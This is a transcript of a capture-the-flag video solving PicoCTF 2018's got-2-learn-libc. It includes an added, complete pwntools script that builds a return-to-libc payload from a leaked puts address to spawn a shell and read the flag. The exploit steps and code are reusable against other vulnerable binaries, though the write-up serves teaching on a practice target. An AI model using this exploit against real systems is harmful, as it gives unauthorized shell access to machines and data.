What's going on, YouTube? This is another CTF challenge video write-up, for the challenge got-2-learn-libc from PicoCTF 2018. So it says, "This program gives you the address of some system calls. Can you get a shell?" You can find the problem here on the shell server, and we're given the source code as well. So let's go ahead and wget these things. I've just created a directory for us to work in, and we can download the program and the source. So let's take a look at the source code. See what we're working with here. Looks like we have some regular includes, some definitions for the buffer size and flag size. We have a useful string, /bin/sh. So just the shell command that you'd see on Linux, not bash, but just sh. And it says maybe this can be used to spawn a shell. Okay, cool. That is going to be useful for us. We have a vulnerable function here that reads in a buffer. Supposedly it says "enter a string", and then it does not check the boundaries on our buffer. So we can, like, go through with a buffer overflow attack and exploit here. It says "thanks, exiting now", and then that's about it. Okay. The main function sets our privileges to the next user, or whoever actually owns this on the shell server. It says this prevents /bin/sh from dropping the privileges. Okay, handy. Because that means we will end up wanting to spawn a shell with this. And then it gives us some useful addresses. It gives us the address for puts, fflush, read, write, and the useful string. And then it lets us run the vulnerable function. Okay. So let's take a look at what we really have when we run the binary here. Let's mark this as executable and try and run it. It says here are some useful addresses, puts 0xf7dc..., et cetera, et cetera. Same thing for all of these. They all seem to be in the same kind of format. And we can say with that f7 that it is very likely on the stack, or the location of the function kind of in memory as we're running the program.
It also gives us the useful string, which is probably just going to be, I'm probably wrong about this, it's not the .data or the .bss section, it's one of those. But that will remain constant. That should not change. And I think if we run this again and again, maybe ASLR is on, or, yeah, I'm wrong about how I'm finding these addresses or why they do not change, but they do not, thankfully for us in this case. So what we can use and what we can take advantage of is actually some, oh, it looks like the useful string address changes. Maybe that's being stored in a different location each time. That's fine. Still something we can pull out because we're running the binary. So what we do want to be able to do is actually use a return-to-libc attack. And you can look this up online and find plenty of guides that do a much better job of explaining it than I do. But if you want to see it happen, this is how we can go about doing it here. So because we're given some of the addresses here, normally you'd be able to find these in, like, a memory leak or some corruption in the program that will allow us to find these memory addresses. We can determine the address of system, or like the C function system that will run a system command. And in the case that we want, run /bin/sh, or the useful string, to spawn a shell. So since we can figure this out by determining just an offset between one of these functions that is part of libc and the address of system in libc, we can calculate where it really is when this binary runs, or when we run the program. So maybe that doesn't make sense right now, but let's walk through and do it for real. I'm going to open up the vulnerable program in GDB, and we could just want to examine puts, right? Puts can be the function that we want to choose to actually determine where system is in the program's memory. It's not going to give me anything yet because it hasn't run the program.
So if I just hit, like, run, we could break at main or something if we ever wanted to just, in fact, let's do that. b main, hit run. And now that we've broken, we have all of the functions still initialized. So I can just simply x puts and it's at that location, right? Okay, let's just take note of this. I'll nano, or let's subl attack.py. Get something moving here. Let's create a script, #!/usr/bin/env python, and let's say gdb_puts can equal that. And now let's go ahead and find the location of system. So that's at this address. Okay, so now we can find gdb_system. Great, so let's determine the offset, right? We'll say offset will equal gdb_puts minus gdb_system. And now this offset, we can apply that with just using simple math, right? To go ahead and determine where that real system function is when we run the binary, because we're seeing that leaked address for puts, or whatever any of these system calls that we particularly want, when we're running the program. So now let's go ahead and run the program, right? Let's clear out some of these and just work on our script here. I'm going to use pwntools because it's awesome. So let's say elf can equal ELF, or pwn.ELF('./vuln'). So if I were to look at it, now I have the binary that I can handle and work with. Cool, so what I could do is now determine a process for it. So let's do elf.process(), that will just be p. So it will run the binary just fine for us. If I run python attack, it's going to start and stop the process. Let's go ahead and work with it. Let's do print p.recv() and it tells us, okay, here are some useful addresses. Let's call this prompt so we can go ahead and work with it, and let's print out prompt, right? And now let's carve out the information that we want. Let's use regular expressions and let's do re.findall because I think that's pretty nice, good hack. re.findall puts location with our prompt, and let's see what we got here. Okay, it is finding the address just fine for us.
Great, let's say puts address, or we can just call it puts, that's fine. And let's say bin bash, let's find the location of the useful string. We'll just carve that out so we can print puts, make sure we get that just fine, and print bin bash. Make sure we get that just fine, or bin sh, whatever. Great, okay, carve them out just fine. So now we can determine an offset that we've already calculated, right? We can use the offset to determine the real location of system by simply saying system can equal the puts location that we're getting. Let's go ahead and convert that from hex, right? Because that is int 16, because that's giving it to us as a string. We want to take it as an actual number, and let's go ahead and subtract the offset. So now I got system, and let's print out the hex of that to see if it's a pretty good candidate, right? For where system could really be in the binary. Looks like it works just fine for us. Okay, so now that we know the location of system, we can use that buffer overflow attack and technique to go ahead and exploit this binary and call system and run bin bash, get a shell. So let's do that. We want to overflow this. Let's test in the command line. Let's go ahead and do python -c, print. What's the buffer here? 148. Okay, let's crank that. Let's do A times maybe 156, or 140. Thinking about numbers here. 52, 56, yeah. Let's go 160. See what we cover. Crank that into vulnerable. No segfault. Let's go 64. Geez, about 80. Does it not? Let's go 200. Am I even echoing this correctly? No, I'm not. Oh, I'm an idiot. I'm sorry. Okay, that's totally my fault. I'm sorry. Now we should totally get a segfault. All right, sweet, 160. Let's check out dmesg now. Okay, 4141. Let's do 156. And then add in BBBB. There, that is the, okay, great. That is the offset. So we want now our payload to equal A times 156. And then we want the address of the function that we want to go ahead and jump to, right? So we need that in little endian.
And that's why we have pwn installed, or pwntools. So we can use p32 of system. Payload plus equals p32 of system. We need a return address following that, right? So that can be junk, four letters, because that's just the size that we need. And then we can use payload plus equals that useful string. But remember, it's got to be in little endian. So bin bash, or I suppose bin sh is the proper name. Great, so now we've got our payload. Okay, let's go ahead and send this to the program, right? Let's do p.sendline(payload). And then let's make it interactive now that we've actually sent the payload and exploited it, supposedly. So let's go p.interactive(). That sounds really funny to say. Let's go p.interactive(). All right, we can run our script. And okay, broke something. Cannot convert argument, integer. Oh, binsh is still int 16. Let's do the same thing for puts. So we convert as a real number and not a string. We don't need to do that in our system calculation anymore, or the system print anymore either. So now we run this, fingers crossed. Still have an issue. What is the problem? System. Oh, goodness, puts. I had a typo. Okay, thanks, exiting now. And nothing. Is that the right offset? We were doing, I don't know what I'm thinking there. 42424242, 156 should be the address that we want, but that may not be IP. Yeah, yeah, yeah. Okay, so I didn't fill up the instruction pointer. I always do that. I always misread this portion when I should really be looking at the instruction pointer that follows. So let's change this to 160 and let's see how that works. Maybe, hopefully, please, run our attack script. Okay, cool. We don't get an end of file. I can ls and we have a shell. All right. So we are successfully running shell, or bin sh. So now we can use the same attack script in our actual, like, on the shell server, right? Do it for real. So let's ssh, get over there, enter my password, and let's jump to that location.
And one awesome thing about PicoCTF, like, props to them, is that they, can I write in here, attack.sh, or .py? I don't have permission. Okay. Let's make a home directory thing. Oh boy. mkdir john, sweet. cd john. Okay. Let's copy all of those things into here. Can I do that? Nope. Don't have flag. Okay. Let's create a symbolic link, ln -s, this thing, flag, flag.txt, into this directory. Okay, cool. So I can't read it still, but I can work with vuln and vuln.c and everything. So let's create our attack.py in a file now that we have permission to write in. And let's go ahead and paste all this information in. So the awesome thing about PicoCTF is that they actually have all of these, like, attack tools and stuff that we want. I think radare2 is actually installed on this. Oh, guess not. But pwntools is certainly installed. And we can use those on the shell server. So let's go ahead and run python attack. It starts our program. And we fail. Why is that? Maybe we can run GDB and change these variables. Maybe it's just the shell server specifically. Let's try and run gdb vuln. Run it. And then let's x system. Take note of this. And x puts. Take note of this. Now let's modify our script to use these values, which is the same. But system is different. Huh, peculiar. Okay. Now let's see how we do. python attack. Sweet. We have a shell. Let's check out flag.txt. Still no. What? Oh, you know what? Maybe I'm an idiot. I probably, yeah, I have suddenly retained all of these permissions. And that's not cool. Let's change our attack script once again to not just use this, not just use our binary and the one in our directory as the real program that we're trying to run, but instead use the one at that location. So nano attack.py. And then rather than using pwn.ELF at vuln in the current directory, let's do it at the real problem. So now fingers crossed. All right. Can I now read flag.txt? Yes, I can. Awesome. That was cool.
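The script assembled in the video above, reconstructed here as an added example rather than the video's own code. It splits the work into functions so the offset arithmetic and the payload layout can be checked without the binary: parse the leaked banner, turn the GDB-measured distance between puts and system into the runtime address of system, and lay out 160 bytes of padding (the video's 156 only reached the saved EBP, hence the 0x42424242 in dmesg, and the return address sits four bytes further), then the address of system, a fake return address, and the address of the "/bin/sh" string as system's argument. The banner text, the GDB addresses and the `Enter a string:` prompt are constructed placeholders, not values from the challenge; only the live run at the bottom needs pwntools and the `./vuln` binary, and it uses Python 3 bytes where the video used Python 2 strings.

```python
#!/usr/bin/env python3
"""Added example: ret2libc payload construction for got-2-learn-libc.

The GDB addresses and the sample banner below are constructed placeholders;
read the real ones with `x puts` / `x system` in GDB, as done in the video.
"""
import re
import struct

# 148-byte buffer; 'A'*156 + 'BBBB' overwrote the saved EBP (0x42424242 in
# dmesg), and the saved EIP follows it, so 160 bytes reach the return address.
EIP_OFFSET = 160


def parse_leaks(prompt):
    """Pull every 'name 0xaddr' pair out of the program's banner."""
    leaks = {}
    for name, addr in re.findall(r"(\w+):?\s+(0x[0-9a-fA-F]+)", prompt):
        leaks[name] = int(addr, 16)
    return leaks


def libc_offset(gdb_puts, gdb_system):
    """Distance between puts and system inside libc. Constant across runs even
    with ASLR, because the whole shared library is relocated as one block."""
    return gdb_puts - gdb_system


def resolve_system(leaked_puts, offset):
    """Apply the fixed offset to the puts address leaked by this run."""
    return leaked_puts - offset


def build_payload(system_addr, binsh_addr, padding=EIP_OFFSET):
    """'A'*padding | &system | fake return | &"/bin/sh"  (32-bit cdecl)."""
    return (b"A" * padding
            + struct.pack("<I", system_addr)   # overwrites the saved EIP
            + b"JUNK"                          # return address once system() returns
            + struct.pack("<I", binsh_addr))   # first argument to system()


# Constructed sample banner shaped like the challenge's output (not a capture).
SAMPLE_PROMPT = (
    "Here are some useful addresses:\n"
    "puts: 0xf7dc0000\n"
    "fflush 0xf7dba000\n"
    "read: 0xf7e40000\n"
    "write: 0xf7e41000\n"
    "useful_string: 0xffffd3c0\n"
    "\nEnter a string:\n"
)
# Constructed placeholder GDB values (assumption): replace with `x puts` / `x system`.
GDB_PUTS = 0xF7E4B000
GDB_SYSTEM = 0xF7E1E000


def demo_payload():
    """Offline walk-through on the constructed banner; returns (system, payload)."""
    leaks = parse_leaks(SAMPLE_PROMPT)
    system = resolve_system(leaks["puts"], libc_offset(GDB_PUTS, GDB_SYSTEM))
    return system, build_payload(system, leaks["useful_string"])


if __name__ == "__main__":
    # Live run, as in the video: needs pwntools and ./vuln next to this script.
    from pwn import ELF, context
    context.log_level = "error"
    p = ELF("./vuln").process()
    # Prompt text is an assumption about the program's output; adjust to match.
    leaks = parse_leaks(p.recvuntil(b"Enter a string:").decode())
    system = resolve_system(leaks["puts"], libc_offset(GDB_PUTS, GDB_SYSTEM))
    p.sendline(build_payload(system, leaks["useful_string"]))
    p.interactive()
```

Run it with `python3 attack.py` in the challenge directory for the live path; importing the module and calling `demo_payload()` exercises the arithmetic and layout alone. The video's second stumble, where the shell appeared but flag.txt stayed unreadable, is not a payload problem: `ELF("./vuln")` must point at the setgid copy in the problem directory, not a local copy, or the spawned shell keeps the unprivileged group.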
I hope you liked that one. I hope you learned a lot. Hopefully I didn't breeze through it too much, or I didn't go into too many weird tangents or say too many stupid things that totally derailed what you were trying to learn. But that is the attack for a return-to-libc, like, technique, right? You can, if you have a memory leak or if you can find the address of some function in the binary while the binary is running, you can calculate where system is going to be in libc. And then you can go ahead and run system with some strings you can probably dig out or carve out of the binary. In this case, Pico was very nice to us and they just straight up gave us a string for /bin/sh. And awesome. Now you've got a shell, because you can call system if you've got an attack where you can control EIP, or the instruction pointer, call system, give the argument to run a shell command, run bash maybe, and then you've got a compromised system in a cool, cool case. So let's take note of this, flag.txt for real. There it is. Let's go ahead and submit it, 250 points, not a whole lot of solves. So some good learning, some good learning that we just did there. Let's move that to a completed challenge and we are done. Alrighty, before I go, I want to thank again and again, so much that it's painful to me and other people, thank you to the people that support me on Patreon. I cannot say it enough. $1 a month on Patreon will give you a special shout-out just like this at the end of every video. Get your name up in lights at the very end of a video that stupid John Hammond produces on the internet. I don't know why that would be appealing, but I'm grateful for you and your generous donations, and thank you for funding me. Can't say it enough.
$5 a month on Patreon will give you early access to all the videos that I create and release on YouTube before they go live, because I like to try and backlog some stuff, although I am not always successful. But in the case that you do want to see some of that stuff preemptively, if you catch it at the right time, then $5 a month, and I'm grateful for you and your support. All right, if you did like this video, please do like, comment and subscribe. Join us in the Discord server, link in the description, awesome community, really great people. It's growing and getting bigger and I'm loving it. I hope you guys are too. All right, I'll record something else now. I'm on a kick, I'm in a groove. Hopefully I can get a few more of these done. Hope to see you guys in the next video. Hope to see you on Patreon, and have a great day.